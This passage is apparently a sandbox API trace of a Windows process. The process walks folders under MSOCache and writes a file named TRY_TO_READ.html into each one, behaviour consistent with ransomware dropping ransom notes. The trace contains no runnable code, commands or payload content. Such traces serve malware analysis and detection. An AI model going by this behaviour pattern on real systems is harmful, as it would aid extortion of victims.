lpMem=0x328f90 | out: hHeap=0x2e0000) returned 1 [0116.682] GetLastError () returned 0x0 [0116.682] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xb0) returned 0x33ac00 [0116.682] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\TRY_TO_READ.html" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x458 [0116.684] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x33ac00 | out: hHeap=0x2e0000) returned 1 [0116.684] WriteFile (in: hFile=0x458, lpBuffer=0x348ed8*, nNumberOfBytesToWrite=0x548, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x348ed8*, lpNumberOfBytesWritten=0x2acfb00*=0x548, lpOverlapped=0x0) returned 1 [0116.685] WriteFile (in: hFile=0x458, lpBuffer=0x45a1f8*, nNumberOfBytesToWrite=0xf28, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x45a1f8*, lpNumberOfBytesWritten=0x2acfb00*=0xf28, lpOverlapped=0x0) returned 1 [0116.685] WriteFile (in: hFile=0x458, lpBuffer=0x4428d0*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x4428d0*, lpNumberOfBytesWritten=0x2acfb00*=0x4b, lpOverlapped=0x0) returned 1 [0116.686] CloseHandle (hObject=0x458) returned 1 [0116.686] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30e128 | out: hHeap=0x2e0000) returned 1 [0116.686] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x330c48 | out: hHeap=0x2e0000) returned 1 [0116.686] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x330c38 | out: hHeap=0x2e0000) returned 1 [0116.686] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x328f08 | out: hHeap=0x2e0000) returned 1 [0116.686] FindNextFileW (in: hFindFile=0x35dc98, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xf58ee8d0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf6e0ec10, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf6e0ec10, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{90140000-00A1-0409-1000-0000000FF1CE}-C", cAlternateFileName="{92572~1")) returned 1 [0116.686] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x328710 | out: hHeap=0x2e0000) returned 1 [0116.686] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3240e0 [0116.686] GetLastError () returned 0x0 [0116.686] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x328710 [0116.686] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3240e0 | out: hHeap=0x2e0000) returned 1 [0116.686] GetLastError () returned 0x0 [0116.686] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x60) returned 0x338758 [0116.686] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x60) returned 0x3387c0 [0116.686] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x338758 | out: hHeap=0x2e0000) returned 1 [0116.686] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3387c0 | out: hHeap=0x2e0000) returned 1 [0116.686] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x328f08 [0116.686] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x34e378 [0116.686] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x328f90 [0116.686] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x330c38 [0116.686] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x330c48 [0116.686] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3240e0 [0116.686] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x329018 [0116.686] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3240e0 | out: hHeap=0x2e0000) returned 1 [0116.686] GetLastError () returned 0x0 [0116.687] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xc0) returned 0x30e128 [0116.687] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x329018 | out: hHeap=0x2e0000) returned 1 [0116.687] GetLastError () returned 0x0 [0116.687] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xb0) returned 0x33ac00 [0116.687] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\TRY_TO_READ.html" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x458 [0116.689] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x33ac00 | out: hHeap=0x2e0000) returned 1 [0116.689] WriteFile (in: hFile=0x458, lpBuffer=0x348ed8*, nNumberOfBytesToWrite=0x548, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x348ed8*, lpNumberOfBytesWritten=0x2acfb00*=0x548, lpOverlapped=0x0) returned 1 [0116.689] WriteFile (in: hFile=0x458, lpBuffer=0x45a1f8*, nNumberOfBytesToWrite=0xf28, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x45a1f8*, lpNumberOfBytesWritten=0x2acfb00*=0xf28, lpOverlapped=0x0) returned 1 [0116.690] WriteFile (in: hFile=0x458, lpBuffer=0x4428d0*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x4428d0*, lpNumberOfBytesWritten=0x2acfb00*=0x4b, lpOverlapped=0x0) returned 1 [0116.690] CloseHandle (hObject=0x458) returned 1 [0116.690] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30e128 | out: hHeap=0x2e0000) returned 1 [0116.690] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x330c48 | out: hHeap=0x2e0000) returned 1 [0116.690] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x330c38 | out: hHeap=0x2e0000) returned 1 [0116.690] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x328f90 | out: hHeap=0x2e0000) returned 1 [0116.690] FindNextFileW (in: hFindFile=0x35dc98, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xa5b30b20, ftCreationTime.dwHighDateTime=0x1d305f1, ftLastAccessTime.dwLowDateTime=0xa5bc90a0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa5bc90a0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{90140000-00B4-0409-1000-0000000FF1CE}-C", cAlternateFileName="{912E0~1")) returned 1 [0116.690] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x328710 | out: hHeap=0x2e0000) returned 1 [0116.690] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3240e0 [0116.690] GetLastError () returned 0x0 [0116.690] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x328710 [0116.690] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3240e0 | out: hHeap=0x2e0000) returned 1 [0116.690] GetLastError () returned 0x0 [0116.690] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x60) returned 0x3387c0 [0116.690] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x60) returned 0x338758 [0116.690] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3387c0 | out: hHeap=0x2e0000) returned 1 [0116.690] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x338758 | out: hHeap=0x2e0000) returned 1 [0116.690] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x328f90 [0116.690] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x34e328 [0116.690] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x329018 [0116.690] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x330c38 [0116.691] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x330c48 [0116.691] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3240e0 [0116.691] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x3290a0 [0116.691] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3240e0 | out: hHeap=0x2e0000) returned 1 [0116.691] GetLastError () returned 0x0 [0116.691] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xc0) returned 0x30e128 [0116.691] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3290a0 | out: hHeap=0x2e0000) returned 1 [0116.691] GetLastError () returned 0x0 [0116.691] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xb0) returned 0x33ac00 [0116.691] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\TRY_TO_READ.html" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x458 [0116.697] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x33ac00 | out: hHeap=0x2e0000) returned 1 [0116.697] WriteFile (in: hFile=0x458, lpBuffer=0x348ed8*, nNumberOfBytesToWrite=0x548, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x348ed8*, lpNumberOfBytesWritten=0x2acfb00*=0x548, lpOverlapped=0x0) returned 1 [0116.697] WriteFile (in: hFile=0x458, lpBuffer=0x45a1f8*, nNumberOfBytesToWrite=0xf28, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x45a1f8*, lpNumberOfBytesWritten=0x2acfb00*=0xf28, lpOverlapped=0x0) returned 1 [0116.698] WriteFile (in: hFile=0x458, lpBuffer=0x4428d0*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x4428d0*, lpNumberOfBytesWritten=0x2acfb00*=0x4b, lpOverlapped=0x0) returned 1 [0116.698] CloseHandle (hObject=0x458) returned 1 [0116.698] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30e128 | out: hHeap=0x2e0000) returned 1 [0116.698] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x330c48 | out: hHeap=0x2e0000) returned 1 [0116.698] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x330c38 | out: hHeap=0x2e0000) returned 1 [0116.698] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x329018 | out: hHeap=0x2e0000) returned 1 [0116.698] FindNextFileW (in: hFindFile=0x35dc98, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xee38cbf0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xee803530, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xee803530, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{90140000-00BA-0409-1000-0000000FF1CE}-C", cAlternateFileName="{90140~4")) returned 1 [0116.698] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x328710 | out: hHeap=0x2e0000) returned 1 [0116.698] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3240e0 [0116.698] GetLastError () returned 0x0 [0116.698] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x328710 [0116.698] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3240e0 | out: hHeap=0x2e0000) returned 1 [0116.698] GetLastError () returned 0x0 [0116.698] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x60) returned 0x338758 [0116.698] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x60) returned 0x3387c0 [0116.698] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x338758 | out: hHeap=0x2e0000) returned 1 [0116.698] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3387c0 | out: hHeap=0x2e0000) returned 1 [0116.698] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x329018 [0116.698] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x34e2d8 [0116.698] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x3290a0 [0116.698] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x330c38 [0116.698] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x330c48 [0116.699] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3240e0 [0116.699] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x329128 [0116.699] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3240e0 | out: hHeap=0x2e0000) returned 1 [0116.699] GetLastError () returned 0x0 [0116.699] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xc0) returned 0x30e128 [0116.699] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x329128 | out: hHeap=0x2e0000) returned 1 [0116.699] GetLastError () returned 0x0 [0116.699] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xb0) returned 0x33ac00 [0116.699] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\TRY_TO_READ.html" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x458 [0116.702] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x33ac00 | out: hHeap=0x2e0000) returned 1 [0116.702] WriteFile (in: hFile=0x458, lpBuffer=0x348ed8*, nNumberOfBytesToWrite=0x548, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x348ed8*, lpNumberOfBytesWritten=0x2acfb00*=0x548, lpOverlapped=0x0) returned 1 [0116.703] WriteFile (in: hFile=0x458, lpBuffer=0x45a1f8*, nNumberOfBytesToWrite=0xf28, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x45a1f8*, lpNumberOfBytesWritten=0x2acfb00*=0xf28, lpOverlapped=0x0) returned 1 [0116.703] WriteFile (in: hFile=0x458, lpBuffer=0x4428d0*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x4428d0*, lpNumberOfBytesWritten=0x2acfb00*=0x4b, lpOverlapped=0x0) returned 1 [0116.703] CloseHandle (hObject=0x458) returned 1 [0116.703] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30e128 | out: hHeap=0x2e0000) returned 1 [0116.703] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x330c48 | out: hHeap=0x2e0000) returned 1 [0116.703] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x330c38 | out: hHeap=0x2e0000) returned 1 [0116.703] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3290a0 | out: hHeap=0x2e0000) returned 1 [0116.703] FindNextFileW (in: hFindFile=0x35dc98, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xe7b68970, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe8729610, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe8729610, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{90140000-0115-0409-1000-0000000FF1CE}-C", cAlternateFileName="{90140~1")) returned 1 [0116.703] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x328710 | out: hHeap=0x2e0000) returned 1 [0116.703] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3240e0 [0116.703] GetLastError () returned 0x0 [0116.703] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x328710 [0116.703] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3240e0 | out: hHeap=0x2e0000) returned 1 [0116.704] GetLastError () returned 0x0 [0116.704] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x60) returned 0x3387c0 [0116.704] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x60) returned 0x338758 [0116.704] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3387c0 | out: hHeap=0x2e0000) returned 1 [0116.704] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x338758 | out: hHeap=0x2e0000) returned 1 [0116.704] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x3290a0 [0116.704] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x34e288 [0116.704] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x329128 [0116.704] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x330c38 [0116.704] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x330c48 [0116.704] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3240e0 [0116.704] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x3291b0 [0116.704] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3240e0 | out: hHeap=0x2e0000) returned 1 [0116.704] GetLastError () returned 0x0 [0116.704] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xc0) returned 0x30e128 [0116.704] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3291b0 | out: hHeap=0x2e0000) returned 1 [0116.704] GetLastError () returned 0x0 [0116.704] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xb0) returned 0x33ac00 [0116.704] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\TRY_TO_READ.html" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x458 [0116.706] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x33ac00 | out: hHeap=0x2e0000) returned 1 [0116.706] WriteFile (in: hFile=0x458, lpBuffer=0x348ed8*, nNumberOfBytesToWrite=0x548, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x348ed8*, lpNumberOfBytesWritten=0x2acfb00*=0x548, lpOverlapped=0x0) returned 1 [0116.707] WriteFile (in: hFile=0x458, lpBuffer=0x45a1f8*, nNumberOfBytesToWrite=0xf28, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x45a1f8*, lpNumberOfBytesWritten=0x2acfb00*=0xf28, lpOverlapped=0x0) returned 1 [0116.707] WriteFile (in: hFile=0x458, lpBuffer=0x4428d0*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x4428d0*, lpNumberOfBytesWritten=0x2acfb00*=0x4b, lpOverlapped=0x0) returned 1 [0116.707] CloseHandle (hObject=0x458) returned 1 [0116.708] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30e128 | out: hHeap=0x2e0000) returned 1 [0116.708] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x330c48 | out: hHeap=0x2e0000) returned 1 [0116.708] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x330c38 | out: hHeap=0x2e0000) returned 1 [0116.708] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x329128 | out: hHeap=0x2e0000) returned 1 [0116.708] FindNextFileW (in: hFindFile=0x35dc98, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfa13c510, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfc112b50, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfc112b50, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{90140000-0117-0409-1000-0000000FF1CE}-C", cAlternateFileName="{9AFC7~1")) returned 1 [0116.708] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x328710 | out: hHeap=0x2e0000) returned 1 [0116.708] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3240e0 [0116.708] GetLastError () returned 0x0 [0116.708] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x328710 [0116.708] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3240e0 | out: hHeap=0x2e0000) returned 1 [0116.708] GetLastError () returned 0x0 [0116.708] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x60) returned 0x338758 [0116.708] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x60) returned 0x3387c0 [0116.708] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x338758 | out: hHeap=0x2e0000) returned 1 [0116.708] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3387c0 | out: hHeap=0x2e0000) returned 1 [0116.708] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x329128 [0116.708] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x34e238 [0116.708] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x3291b0 [0116.708] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x330c38 [0116.708] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x330c48 [0116.708] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3240e0 [0116.708] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x329238 [0116.708] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3240e0 | out: hHeap=0x2e0000) returned 1 [0116.708] GetLastError () returned 0x0 [0116.708] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xc0) returned 0x30e128 [0116.708] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x329238 | out: hHeap=0x2e0000) returned 1 [0116.708] GetLastError () returned 0x0 [0116.709] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xb0) returned 0x33ac00 [0116.709] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\TRY_TO_READ.html" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x458 [0116.710] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x33ac00 | out: hHeap=0x2e0000) returned 1 [0116.710] WriteFile (in: hFile=0x458, lpBuffer=0x348ed8*, nNumberOfBytesToWrite=0x548, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x348ed8*, lpNumberOfBytesWritten=0x2acfb00*=0x548, lpOverlapped=0x0) returned 1 [0116.711] WriteFile (in: hFile=0x458, lpBuffer=0x45a1f8*, nNumberOfBytesToWrite=0xf28, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x45a1f8*, lpNumberOfBytesWritten=0x2acfb00*=0xf28, lpOverlapped=0x0) returned 1 [0116.711] WriteFile (in: hFile=0x458, lpBuffer=0x4428d0*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x4428d0*, lpNumberOfBytesWritten=0x2acfb00*=0x4b, lpOverlapped=0x0) returned 1 [0116.712] CloseHandle (hObject=0x458) returned 1 [0116.712] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30e128 | out: hHeap=0x2e0000) returned 1 [0116.712] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x330c48 | out: hHeap=0x2e0000) returned 1 [0116.712] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x330c38 | out: hHeap=0x2e0000) returned 1 [0116.712] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3291b0 | out: hHeap=0x2e0000) returned 1 [0116.712] FindNextFileW (in: hFindFile=0x35dc98, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfe09ced0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x18179b90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x18179b90, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{91140000-0011-0000-1000-0000000FF1CE}-C", cAlternateFileName="{91140~1")) returned 1 [0116.712] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x328710 | out: hHeap=0x2e0000) returned 1 [0116.712] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3240e0 [0116.712] GetLastError () returned 0x0 [0116.712] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x328710 [0116.712] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3240e0 | out: hHeap=0x2e0000) returned 1 [0116.712] GetLastError () returned 0x0 [0116.712] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x60) returned 0x3387c0 [0116.712] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x60) returned 0x338758 [0116.712] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3387c0 | out: hHeap=0x2e0000) returned 1 [0116.712] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x338758 | out: hHeap=0x2e0000) returned 1 [0116.712] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x3291b0 [0116.712] 